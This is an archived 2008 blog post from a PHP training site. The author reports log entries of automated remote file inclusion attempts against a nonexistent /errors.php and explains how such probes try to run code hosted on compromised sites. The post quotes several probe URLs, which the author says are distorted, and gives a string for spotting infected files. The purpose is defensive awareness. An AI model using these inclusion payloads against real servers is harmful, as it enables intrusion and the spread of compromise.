Training, Open Source Programming Languages

Print friendly page
Home Accessibility Courses Twitter The Mouth Facebook Resources Site Map About Us Contact
 
For 2023 (and 2024 ...) - we are now fully retired from IT training.
We have made many, many friends over 25 years of teaching about Python, Tcl, Perl, PHP, Lua, Java, C and C++ - and MySQL, Linux and Solaris/SunOS too. Our training notes are now very much out of date, but due to upward compatability most of our examples remain operational and even relevant ad you are welcome to make us if them "as seen" and at your own risk.

Lisa and I (Graham) now live in what was our training centre in Melksham - happy to meet with former delegates here - but do check ahead before coming round. We are far from inactive - rather, enjoying the times that we are retired but still healthy enough in mind and body to be active!

I am also active in many other area and still look after a lot of web sites - you can find an index ((here))
Are nasty programs looking for security holes on your server?

Looking through my log file reports for the last week, I have found the following in my "failed requests" log.

 546: /errors.php
  52:   /errors.php?error=http://www.beautiful-america.com/admin/id.txt?
  42:   /errors.php?error=http://www.ticarbon.de/phpBB2/files/i?
  32:   /errors.php?error=http://test.iearn.uz/test.iearn.uz/assist.txt???
  27:   /errors.php?error=http://www.dg-mitteldeutschland.de/sys_crank/i?
  26:   /errors.php?error=http://hornydate.co.uk/sparky.txt??
  25:   /errors.php?error=http://www.sternkinder2007.de/video/lol?

So what are these requests? Should I be worried?

They're attempts to break into my system. But I'm not being particularly targeted - this is an automated attack, attempting to call on a script which I don't have to run code that's held on those remote sites which have previously been compromised. And if they succeed, they they'll set the same hole up on my system and carry on to the next.

The particular accesses above actually don't worry me - they were all "404"d - but rather they form a warning of the dangers of allowing external code to be included in PHP.

Visiting the URLs given as the "error=" parameter, I find a variety of "not found" pages which means that the hole has not been closed on the remote system, and nasty pieces of PHP which mean that the remote machine is still compromised. (If you, reading this article, visit any of them you should get a 404 as I have distorted the URLs that were live - I don't want to make this into a "how to break in" manual page!). But I do have copies of the scripts that I can show bona fide delegates on our PHP courses, and of the futher log details of the programs (often in Perl) that are injected.

If you are worried about being infected, the particular attack file contains the string "Mic22" - so if you search for that ...
(written 2008-02-17, updated 2008-02-18)

 
Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
H117 - Security in PHP
  [345] Spotting a denial of service attack - (2005-06-12)
  [426] Robust checking of data entered by users - (2005-08-27)
  [920] A lion in a cage - PHP - (2006-11-10)
  [947] What is an SQL injection attack? - (2006-11-27)
  [1052] Learning to write secure, maintainable PHP - (2007-01-25)
  [1086] Injection attacks - safeguard your PHP scripts - (2007-02-20)
  [1323] Easy handling of errors in PHP - (2007-08-27)
  [1387] Error logging to file not browser in PHP - (2007-10-11)
  [1396] Using PHP to upload images / Store on MySQL database - security questions - (2007-10-19)
  [1482] A story about benchmarking PHP - (2007-12-23)
  [1679] PHP - Sanitised application principles for security and useability - (2008-06-16)
  [1694] Defensive coding techniques in PHP? - (2008-07-02)
  [1747] Who is watching you? - (2008-08-10)
  [1779] Injection Attacks - avoiding them in your PHP - (2008-08-31)
  [2025] Injection Attack if register_globals in on - PHP - (2009-02-04)
  [2628] An example of an injection attack using Javascript - (2010-02-08)
  [2688] Security considerations in programming - what do we teach? - (2010-03-22)
  [2939] Protecting your images from use out of context - (2010-08-29)
  [3210] Catchable fatal error in PHP ... How to catch, and alternative solutions such as JSON - (2011-03-22)
  [3698] How to stop forms on other sites submitting to your scripts - (2012-04-15)
  [3747] An easy way to comply with the new cookie law if your site is well designed - (2012-06-02)
  [3813] Injection Attacks - PHP, SQL, HTML, Javascript - and how to neutralise them - (2012-07-22)
  [4642] A small teaching program - demonstration of principles only - (2016-02-08)


Back to
Colour, Composition or Content
 Previous and next
or
Horse's mouth home		 Forward to
Learning Object Oriented Principles (and perhaps Java)
Some other Articles
The geometry of East London
Letting new visitors know we provide training courses
FSB, EGM, AGM.
Learning Object Oriented Principles (and perhaps Java)
Are nasty programs looking for security holes on your server?
Colour, Composition or Content
Chinese New Year
A forum is not always the best vehicle
Teaching Object Oriented Java with Students and Ice Cream
To Wales - where theres still a toll on the bridge
4759 posts, page by page
Link to page ... 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 at 50 posts per page


This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.

Link to Ezine home page (for reading).
Link to Blogging home page (to add comments).
You can Add a comment or ranking to this page

Like this? ??

Related short articles
Some thoughts on 2017, and looking forward to 2018
Looking forward to the autumn.
Looking ahead on the blog
Web Server Admin - some of those things that happen, and solutions
Starting MySQL. ERROR! The server quit without updating PID file - how we fixed it.
Server program written in Tcl using sockets
A Java servlet that is also a stand alone program. And a server that is also a web client.
Looking Forward - TransWilts Community Rail Partnership and TransWilts CIC
Backup procedures - via backup server
Identifying and clearing denial of service attacks on your Apache server
Sending a message to the server and changing text on a page when a button is pressed
Looking to the future at Melksham Station
Changing transport and destinations - looking forward to a good future
More or less back - what happened to our server the other day
Web server efficiency - saving repetition through caches
Apache httpd - a robust, open source web server
Looking for Creative Design, Catering and Transport inputs to help with Melksham Campus
Linux Web Server - User Roles, User Accounts, and shared administration
Handling failures / absences of your backend server nicely
Servlet v JSP (Java Server Page). What is the difference?
Chamber of Commerce - looking forward in Melksham and in Wessex
Forwarding a whole domain, except for a few directories - Apache http server
A year ago today, a server upgrade and a new Perl example
Solution looking for a problem? Lookahead and Lookbehind
Melksham Chamber of Commerce - looking to our future shape. Pivotal meeting next Tuesday
Why you should use objects even for short data manipulation programs in Ruby
Looking and Learning - even on Holiday
How can I run multiple web servers behind a single IP address?
Keeping our hotel looking like new, by using our gained experience
Looking up
Transport in Cambridgeshire - seen by an outside observer. What can Wiltshire learn?
Telling which ServerAlias your visitor used - useful during merging domains
Looking for hotel rooms in Melksham over Christmas? We still have some availability
Looking forward - Chamber of Commerce has 2012 and beyond on the agenda
Reading and using emails including enclosures on your web server.
Needle in a haystack - finding the web server overload
Getting more log information from the Apache http web server
Distributing the server load - yet ensuring that each user return to the same system (Apache httpd and Tomcat)
Solution looking for problem
Looking back at www.wellho.net
Virtual Hosting with Apache http server - an overall scheme, and avoiding common pitfalls
Learning to write good programs in C and C++ - separating out repeated code
Looking ahead and behind in Regular Expressions - double matching
Setting your user_agent in PHP - telling back servers who you are
wxPython - simple example to add GUI to a server log file analysis
Looking back and forward personally - 6 years each way
PHP data sources - other web servers, large data flows, and the client (browser)
Server logs - drawing a graph of gathered data
Apache httpd Server Status - monitoring your server
Logging the performance of the Apache httpd web server
Looking forward - the next 3000
2999 - looking back
An introduction to file handling in programs - buffering, standard in and out, and file handles
Looking up a value by key - associative arrays / Hashes / Dictionaries
Cycling in Melksham, and looking forward
Writing a server in Java
Sharing our programs - easy. Sharing our data - harder.
Carrying a long URL around - looking for memorable shorts
A simple server benchmark script
TCP v UDP / Client v Server - Python examples
Redirecting to your main domain for correct security keys
Java Server Pages - putting it all together
Skyline and looking up in London
Telling Apache web servers apart / notes for the non-technical
Http protocol - what does a web server send
Your PHP code does not work? Here is where to start looking.
Cant connect to local MySQL server through socket /tmp/mysql.sock
Securing MySQL on a production server
Tcl scripts / processes on a web server via CGI
Looking inside Java classes - javap and javadoc
Looking ahead to the Autumn season of training and accommodation
Ten years in Melksham - looking forward to ten more.
Looking for a practical standards course
Westbury Bypass Refused - looking forward
Tcl - nice and nasty
Client side (Applet) and Server side (Servlet) Graphics in Java
Handling nasty characters - Perl, PHP, Python, Tcl, Lua
MySQL server replication
Always use su with minus. And where do programs come from?
Improving the structure of your early PHP programs
© WELL HOUSE CONSULTANTS LTD., 2024: 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.info/mouth/1542_Are ... rver-.html • PAGE BUILT: Sun Oct 11 16:07:41 2020 • BUILD SYSTEM: JelliaJamb